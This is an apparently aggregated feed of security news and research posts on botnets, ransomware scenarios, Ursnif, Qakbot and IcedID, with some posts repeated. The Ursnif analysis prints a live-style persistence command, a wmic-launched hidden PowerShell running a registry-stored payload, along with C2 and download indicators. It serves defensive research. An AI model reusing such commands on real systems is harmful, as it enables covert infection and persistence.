The conclusion is given by MalwareMustDie team, the group that we all know by of their struggle fighting along the years against botnet coders, through their public tweet in which is shown how this situation can be summarized by a simple fact: “Money”. The veteran DDoS botnet hackers are facilitating frameworks for surviving the DDoS ELF IoT botnet as the income engine: from coordination to each type of coders, linking DDoS-As-Service sites (known as Stressers or Bruters)  to providing the botnet control via API, then supplying infrastructure, assisting the newbies with setups, with all this effort these veterans are urging and provoking green and young actors to do their own botnets. The money scheme is following in these processes by first taking these youngster “weekly allowance”, then getting merit the botnets used by the rented “boaters” , till making profits from cuts taken from case by case with the arrangement of API used for Bruters/Stressers platform for the attackers that pays the service for DDoS”

In the end, this is all about the money circulation scheme that fuels the existence of the IoT botnet, their coders, their stressers behind them. The disrupting this money flow may give us a chance to disrupt this badness so strongly to force the scheme to the discontinuation.

Additional glossary:
*) boaters: they who uses the rented botnet
*) herders: they who herd botnet
*) stressers or bruters are the front end of DDoS-As-Service sites

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp” member of the MalwareMustDie team. 

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.

Security Affairs: Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters

Cayosin Botnet

Money, botnet as service business and coding on the dark side of the life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, is stated in the picture below.

Or elsewhere the same threat actor pronounces a more blatantly made statement in a sentence that sounds like “I am not scared by the death, I am scared more to not live a pleasant life.”

Cayosin Botnet
Image downloaded by Odisseus
from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving in the night with the laptop ever connected aside. In the imaginary world of a teen the adults world becomes a violent jungle dominated by the dark colors of the delirium of omnipotence.  Botnet, packet flooding, bots, power of attack: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and for the first time has been reversed and analyzed (the report is here) by “unixfreaxjp” from the MalwareMustDie team. 

The analysis is sapient and clear: in the reversed samples there are many traces of a collection of attacks that lead to a collection of different source codes.

One of them is the Layer 7 (HTTP) Attack reported in the picture below documenting how this kind of malware can evade the anti-DDoS solutions like Cloudfare.

Cayosin Botnet

From the unixfreaxjp’s Cayosin botnet binary analysis we can understand that the core of the artifact is the “integration” of different botnet source codes, as it is also well documented by reading the now deleted Instagram profile of the 13 years old scriptbots/unholdable, who implemented this Botnet . STD attack, Tsunami, Christmas DDoS attacks were adapted from Kaiten botnet, along with more flood combination taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source code in the same artifact and provided a “As a Service” to other teens or threat actors and sold offhandedly on Instagram. From Mirai source code the Cayosin was taken the table scheme to hide strings used by the botnet to hack the login credential of the vulnerable telnet accounts for known IOT devices, along with other Mirai botnet functionalities. Obviously, the coder was not updating much feature of the C2 which explains how the base protocol of the botnet is still made by Qbot/Torlus basis.

A ready-to-use botnet build to be sold for $20 a month, “full options” on sale with an expiry token and functionalities that were able to ban the users who didn’t renew the expired “licence”.

The combination of more capabilities of the botnet has been well documented also by PERCH Security Threat Report who made a great analysis on it, confirming the combination of these functionalities used in Cayosin along with the deeper OSINT investigation of the threat source.

PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could have easily view of the day by day findings of new exploits  and methods then implemented in the malware to enrich  the harmful capability of the new “product”.

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well, in fact writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point is not excluded that Cayosin is only an evolution of many other botnets made always by the same threat actor (or crew) and in particular of the botnet named Messiah. In the following is reported the advertising of the Messiah botnet with its features which remember Cayosin botnet capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai
Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolving of botnets is the adaptation of the source codes, once one bad actor coder starts to implement something different and other actor coders find it useful, they adapt the capability by merging source codes. Each of coders and botnet provider is racing with others to present their technology of their botnet is better, to attract the market: Youngster and Actors who interest to rent the best service.

The conclusion is given by MalwareMustDie team, the group that we all know by of their struggle fighting along the years against botnet coders, through their public tweet in which is shown how this situation can be summarized by a simple fact: “Money”. The veteran DDoS botnet hackers are facilitating frameworks for surviving the DDoS ELF IoT botnet as the income engine: from coordination to each type of coders, linking DDoS-As-Service sites (known as Stressers or Bruters)  to providing the botnet control via API, then supplying infrastructure, assisting the newbies with setups, with all this effort these veterans are urging and provoking green and young actors to do their own botnets. The money scheme is following in these processes by first taking these youngster “weekly allowance”, then getting merit the botnets used by the rented “boaters” , till making profits from cuts taken from case by case with the arrangement of API used for Bruters/Stressers platform for the attackers that pays the service for DDoS”

In the end, this is all about the money circulation scheme that fuels the existence of the IoT botnet, their coders, their stressers behind them. The disrupting this money flow may give us a chance to disrupt this badness so strongly to force the scheme to the discontinuation.

Additional glossary:
*) boaters: they who uses the rented botnet
*) herders: they who herd botnet
*) stressers or bruters are the frontend of DDoS-As-Service sites

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp” member of the MalwareMustDie team. 

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.



Security Affairs

NBlog Feb 8 – inform and motivate

The malware encyclopedia destined for inclusion in our next awareness module is coming along nicely ...

































It's interesting to research and fun to write in an informative but more informal style than the glossary, with several decidedly tongue-in-cheek entries so far and a few graphics to break up the text.

I guess it will end up at about 20 pages, longer than usual for a general security awareness briefing but 100% on-topic. There's a lot to say about malware, being such a complex and constantly evolving threat. I hope the relaxed style draws readers in and makes them think more carefully about what they are doing without being too do-goody, too finger-wagging. Prompting changes of attitudes and behaviors is our aim, not just lecturing the troops. Awareness and training is pointless if it's not sufficiently motivational.

Cyber Security Week in Review (Feb. 8)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
  • Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which places a period between each letter in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam. 
  • Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Philipino-backed, politically motivated pages.

From Talos


  • An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
  • Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most used.

Malware roundup


  • A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands and execute downloaded files.
  • Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers were able to exploit SS7 to intercept users’ phone calls and text messages, eventually being able to steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign. 
  • New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018. 

The rest of the news


  • Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
  • The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public. 
  • Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.


Bashe: the hypothetical $193 billion ransomware attack

bashe attack ransomware

Around the world, hundreds of thousands of employees in thousands of companies receive an email from the company’s payroll department. It contains a PDF attachment with the details of the employees’ end of year bonuses. Some, the more cautious among them, delete the email, sensing that it could be a phishing attack. Others open the attachment, and release the worst cyberattack in history. 43% of the world’s devices are affected, all of their files encrypted. The cost of this attack reaches a staggering $85 billion.

Fortunately, the world is yet to see anything of this kind. However, according to a study by the Cyber Risk Management (CyRiM) project in Singapore, this is a scenario that we could well experience. The investigation was carried out to illustrate the catastrophic consequences that an incident of this type could have on the economy. It describes an advanced ransomware attack, called Bashe, in detail, along with the devastating effects that it could have.

The study describes several scenarios: the “best case”, in which 43% of the world’s devices are encrypted, causing costs of $85 billion; and the “worst case”, where 97% of devices are encrypted, and costs spiral to $193 billion.

Development of a large-scale attack

The study describes how the developers of the ransomware are recruited to create this malware and design the attack. One of the cybercriminals’ goals is to avoid the pitfalls of previous global attacks. As such, the Bashe attack is designed to use a vulnerability without a patch, and efforts are made to ensure that there is no possibility of an online kill-switch being discovered, as happened with WannaCry.

As with so many other malware campaigns, it is delivered inside attachments, in this case a PDF with the subject “Year-End Bonus”. The malware is able to imitate the email domain of the victim, and thus spoof the ‘sent from’ part of the email header. In this way, the email seems to be coming from someone in the victim’s company.

Once the attachment is opened, the malware is executed, downloading the ransomware worm, encrypting all the data on all the computers that share the network with the infected device. It demands a ransom of $700. To make sure the ransomware spreads as far as possible, the worm automatically forwards the malicious email to all the victim’s contacts. .

In 24 hours, Bashe has encrypted the data on around 30 million devices all around the world.

Companies start to respond

The study explains that the worst hit industries would be retail, healthcare, and manufacturing. In the retail sector, the costs stem from encrypted payment systems, and the collapse of e-commerce thanks to inoperative websites. The healthcare sector is affected due to its heavy reliance on antiquated systems, just as we saw with the WannaCry attacks. As for manufacturing, the encryption of infrastructure and machines necessary for their activity, along with possible problems in shipping networks, logistics, and inventory would be the main problems caused by this kind of attack.

Many companies rely on IT systems to carry out their day-to-day business; this leads around 8% of them to pay the ransom in order to return to normality as quickly as possible. The criminal organization makes between $1.14 and $2.78 billion this way. Smaller companies are most likely to pay the ransom, given their limited capacity to manage disasters of this kind.

The repercussions

Beyond the economic costs detailed above, one of the most immediate outcomes is an increase in distrust of connected devices, along with stricter controls on the use of corporate email.

Another repercussion of the Bashe attack is a dramatic increase in the demand for IT security. Companies want to protect their corporate networks and their assets in order to avoid similar attacks in the future. Cybersecurity training becomes mandatory for employees, and cyberrisk management courses a requirement in order to get an IT security insurance policy.

How to protect yourself against advanced attacks

Although an attack on the same scale as Bashe is unlikely, any kind of cyberattack can have extremely serious repercussions for a company, regardless of its size:

1.- Employee training. We’ve said it time and time again, but one of the most important steps in protecting against the most advanced cyberthreats is awareness. Companies mustn’t wait until an incident like this one occurs to start to train employees in cybersecurity.

2.- Careful with emails. Email plays a key role in the cataclysmic scenario we’ve just seen. And it is far from being the only kind of threat that uses email as an attack vector. In fact, 87% of IT security professionals have admitted that their company has had to deal with some kind of threat that came via email. If you have even the slightest doubt about where and email has come from, the best course of action is to contact the company’s security team.

3.- Advanced security solutions. An IT security suite such as Panda Adaptive Defense can help to detect any attempted attack that tries to get in via email. It does so by using of cognitive intelligence and a real-time detection system. What’s more, it includes a managed Threat Hunting service, which actively searches for the most advanced threats, so that your network is always protected.

The post Bashe: the hypothetical $193 billion ransomware attack appeared first on Panda Security Mediacenter.

NBlog Feb 8 – creative awareness



We're slaving away on the 'malware update' security awareness and training module for March. Malware is such a common and widespread issue that we cover it every year, making it potentially tedious and dull. People soon get bored by the same old notices - not exactly ideal for awareness and training purposes. 

Simply tarting-up and repackaging malware awareness materials we have delivered previously would be relatively easy for us but is not sufficient. Our subscribers deserve more! Aside from needing to reflect today's malware threats and current security approaches, we must find new angles and inject new content each time in order to spark imaginations and engage the audiences, again and again. 

Luckily (in a way), malware is a writhing vipers' pit, constantly morphing as the VXers and antivirus pro's do battle on a daily basis. So what's new this year?

The rapid evolution of malware risks is a story worth telling, but how can we actually do that in practice? We favor a strongly visual approach using an animated sequence of Probability Impact Graphs to explain, year-by-year, how specific malware risks have emerged, grown and then mostly faded away as the world gets on top of them. 

It would be great to have the foresight to predict next year's malware PIG, projecting forward from to today's but that's tricky, even for malware experts (which I'm not). The best I can do is pick out a few trends that illustrate the kinds of things that we might be facing over the remainder of 2019 ... and perhaps make the point that uncertainty is the very essence of 'risk'. If we knew exactly what to expect, we could of course prepare for it and better yet avoid or prevent it happening: we don't, hence we can't, hence we need to be ready for anything, which point links neatly back to January's awareness topic of resilience and business continuity, and forward to April's on incident detection. 

And so our cunning strategic plan continues to bear fruit. Although NoticeBored covers different topics every month, they are all part of information security, all in and around the same core area. The approach is quite deliberate: we're poking at the same blob from different directions, exposing and exploring different aspects in order to help our audiences appreciate the whole thing, whilst at the same time avoiding information overload (trying to cover it all at once) and boredom (the blinkered view). Sometimes we take a step back for more of an overview, occasionally we dive deeper into some particular aspect that catches our attention and hopefully intrigues our customers, especially those with relatively mature awareness and training programs. Advanced topics tend to be quite narrow in scope, but even with those we make a conscious effort to link them into the broader context. 

Key words such as 'information', 'risk', 'security', 'control', 'governance' and 'compliance' inevitably crop up in almost every module. Talking of which, we've come up with a new style of awareness material for March, a malware encyclopedia derived from the NoticeBored information security glossary. The full glossary is a substantial piece of work, over 300 pages long, a whole book's worth of content. It's a fantastic reference source for professionals and specialists working in the field, so good in fact that we use it ourselves since remembering all the fine details on more than 2,000 information security terms is beyond us.

I'll have more to say about the encyclopedia tomorrow. For now, must press on, lots to do.

ThreatList: Latest DDoS Trends by the Numbers

Trends in DDoS attacks show a evolution beyond Mirai code and point to next-gen botnets that are better hidden and have a greater level of persistence on devices – making them "far more dangerous."

Ursnif: Long Live the Steganography and AtomBombing!

Yoroi ZLab – Cybaze uncovered a new wave of Ursnif attacks using a variant that implements an exotic process injection technique called AtomBombing

Another wave of Ursnif attacks hits Italy. 
Ursnif is one of the most active banking trojans. It is also known as GOZI, in fact, it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif uses weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated Powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Ursnif is one of the most active banking trojan. It is also known as GOZI, in fact it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif use weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses an exotic process injection technique called AtomBombing (through QueueUserAPC) which exploit Windows AtomTable, in order to inject into explorer.exe in a more stealthier way, because no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a corrupted Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically purchase order, invoice and so on. 

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code, shows the malware, in the first instance, checks the victim country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro are used to prepare the shell command to launch, concatenating several strings encoded in different ways (mainly in decimal and binary). The resulting command contains a huge binary string, which will be converted into a new Powershell command using the function:

[Convert]::ToInt16() -as[char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

  • https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
  • https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1

The apparently legit image actually contains a new Powershell command. The weaponized image is crafted using the Invoke-PSImage script, which allows to embeds the bytes of a script into the pixels of a PNG file. 

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated Powershell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

Basically, it seems hexadecimal encoded which can be decoded through the previous [Convert]::ToInt16 function.

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It executes another check against victim’s country, ensuring it is Italy. The information derives from the command:

Get-Culture | Format-List -Property *

If the check is positive, the script will download an EXE payload from http://fillialopago[.]info/~DF2F63, store it in %TEMP%\Twain001.exe and then execute it.

At the analysis time, the file is not detected by most antiviruses:

Figure 7. Ursnif loader detection rate

Despite its low detection, this executable is a classic Ursnif loader which is responsible to contact the server to download malicious binary which will be injected into explorer.exe process. It uses the function IWebBrowser.Navigate to download data from its malicious server felipllet[.]info with an URI path that looks like a path to a file video (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request sending encrypted data, as show in the following figure

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored into registry keys at HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The regvalue named “defrdisc” (which reminds to a legit Disk Defragmentation Utility) contains the command will be executed as next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command’s only goal is to execute the data contained into “cmiftall” regvalue through Powershell engine.

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create “powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).cmiftall))”

The “cmiftall”’s data is simply a Powershell script encoded in Hexadecimal way, so it is possible to reconstruct its behavior.

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the Powershell script stored into regkey (shown above), Ursnif is able to allocate space enough for its malicious byte array, containing the final payload, and to start it as legit process’ thread through QueueUserAPC and SleepEx calls.

The Ursnif’s complete workflow is shown in figure:

Figure 13. Ursnif’s workflow.

Finally, from data contained into last script’s byte array, it is possible to extract a DLL which corresponds to what Ursnif inject into explorer.exe process.

This DLL seems to be corrupted, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory using APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is devastating: 0/56 anti-malware detects it.

Figure 15. Final DLL’s detection rate.

Conclusions

As stated first by us in the previous Ursnif analysis in December 2018 and after by Cisco Talos Intelligence in January 2019, also this new Ursnif sample uses the same APC injection technique to instill its final binary into explorer.exe process, along with obfuscation and steganography in order to hide its malicious behaviour. Ursnif is more active and widespread than yesterday, the contacted C2 is not reachable but the malware implant is still alive due to the fact that the crooks are constantly changing their C2 to diverting tracking and analysis.

Yoroi ZLab – Cybaze researchers are continuing the analysis of this undetected DLL in order to extract information and evidences to share with the research community.

Further information, including IoCs and Yara rules are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post Ursnif: Long Live the Steganography and AtomBombing! appeared first on Security Affairs.

Smashing Security #114: Darknet Diaries, death, and beauty apps

Smashing Security #114: Darknet Diaries, death, and beauty apps

Jack Rhysider from the “Darknet Diaries” podcast joins us to chat about his interview with the elusive Hacker Giraffe, how a death is preventing cryptocurrency investors from reaching their money, and how ‘beauty camera’ apps are redirecting users to phishing websites and stealing their selfies.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault.

Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware

Researchers discovered Geodo botnets using a new spam campaign to deliver samples of Qakbot malware.

Cofense observed the botnets delivering non-Geodo malware since at least Jan. 28 via increasingly targeted phishing efforts. The attack begins when a user receives a phishing email containing a weaponized Microsoft Office document. That file contains malicious embedded macros that, when enabled, directly deliver Qakbot malware to the victim’s device. Researchers also witnessed the campaign leveraging IcedID, another banking Trojan, as its final payload.

In both cases, the campaign ends by replacing the binary content with that of calc.exe. This tactic is designed to help the campaign hide in plain sight, which signals Geodo’s evolution as a digital threat. Cofense found additional evidence of this evolution in Geodo’s use of targeted addressing, internal signatures and previous threads to prey on state-level government departments in the U.S. as part of a related malware campaign.

A Surge in Banking Trojans

This attack campaign comes amid a rise in activity for banking Trojans such as Qakbot and IcedID. Check Point observed a 50 percent increase in banking Trojan activity in the first half of 2018, with Dorkbot and Ramnit earning spots on the company’s “Most Wanted Malware” list for June of that year. Two months later, Ramnit placed even higher on Check Point’s monthly malware index.

Other security companies have also observed this trend among banking Trojans. For example, Kaspersky Lab detected 61,000 installation packages for mobile banking malware in Q2 2018 — more than a threefold growth over the previous quarter.

How to Defend Against Threats Like Qakbot Malware

Security professionals can help defend against digital threats like Qakbot malware by using tools such as VBA editor to analyze Office documents for malicious macros. Organizations should also lead by example and implement two-factor authentication (2FA) to prevent digital attackers from accessing and weaponizing their business email accounts.

The post Geodo Botnets Using New Spam Campaign to Deliver Qakbot Malware appeared first on Security Intelligence.

Monero Price Analysis: XMR/USD Set for Critical Retest of December 2018 Low; Monero Still Being Mined Using Malware

The Monero price on Wednesday is seen nursing minor losses of around 1%. However, price action is very much vulnerable to further downside risks. XMR/USD price behavior has formed a bearish flag pattern structure, which is subject to further downside risks. The key near-term level of support that would be noted is $42. Recent Price […]

The post Monero Price Analysis: XMR/USD Set for Critical Retest of December 2018 Low; Monero Still Being Mined Using Malware appeared first on Hacked: Hacking Finance.

Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules.Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules..

I’v been working on cybersecurity for most than 10 years. During my career, I’ve held numerous roles which took me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help a decision or to solve a technical question I started by seeking on “sourceforge/github” looking for something that would fit my needs. If what I needed wasn’t there, I’ve always built it on my own by using what was available at that time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce you a simple but interesting malware catching tool base on static YARA rules that is available HERE.

It takes sample feeds and it analyses them against hundreds of YARA rules. Some of them are publicly available some other have been written on my own. The engine is quite slow right now, but it has analysed several recent Samples. You might decide to get deep into last processed samples by clicking on table raw (which highlights last 10 processed samples) or to search for a specific hash by pasting your desired sha256 and clicking on the “Search” button.

In both ways, a modal form will appear showing out the rules that match the hash you asked for. Since it’s a personal platform it could be quite slow so far. Hope you enjoy it! Have fun

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.

Security Affairs: Security expert Marco Ramilli released for free the Malware Hunter tool

Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules.Malware researcher Marco Ramilli released for free the Malware Hunter tool a simple but interesting catching tool base on static YARA rules..

I’v been working on cybersecurity for most than 10 years. During my career, I’ve held numerous roles which took me facing many problems: I had to solve technical issues as well as management, economic and financial ones. Every time I needed a “tool” to help a decision or to solve a technical question I started by seeking on “sourceforge/github” looking for something that would fit my needs. If what I needed wasn’t there, I’ve always built it on my own by using what was available at that time. Nowadays, those tools are still producing data which I believe might be useful to many people. Today I’d like to introduce you a simple but interesting malware catching tool base on static YARA rules that is available HERE.

It takes sample feeds and it analyses them against hundreds of YARA rules. Some of them are publicly available some other have been written on my own. The engine is quite slow right now, but it has analysed several recent Samples. You might decide to get deep into last processed samples by clicking on table raw (which highlights last 10 processed samples) or to search for a specific hash by pasting your desired sha256 and clicking on the “Search” button.

In both ways, a modal form will appear showing out the rules that match the hash you asked for. Since it’s a personal platform it could be quite slow so far. Hope you enjoy it! Have fun

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – MartyMcFly, malware)

The post Security expert Marco Ramilli released for free the Malware Hunter tool appeared first on Security Affairs.



Security Affairs

ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.

Related Stories

IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help diffuse reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it to a cybercrime-as-a-service operation, similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features similar modules to malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. In their configuration files, it is evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitate redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates versus the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device would not interact with other C&C servers that may belong to other criminals or security researchers.

IBM X-Force Research

Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r) function in the communication with the attack server and got the following code to reveal. Encoding is a common strategy to pack code and make it more compact.

IBM X-Force Research

Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

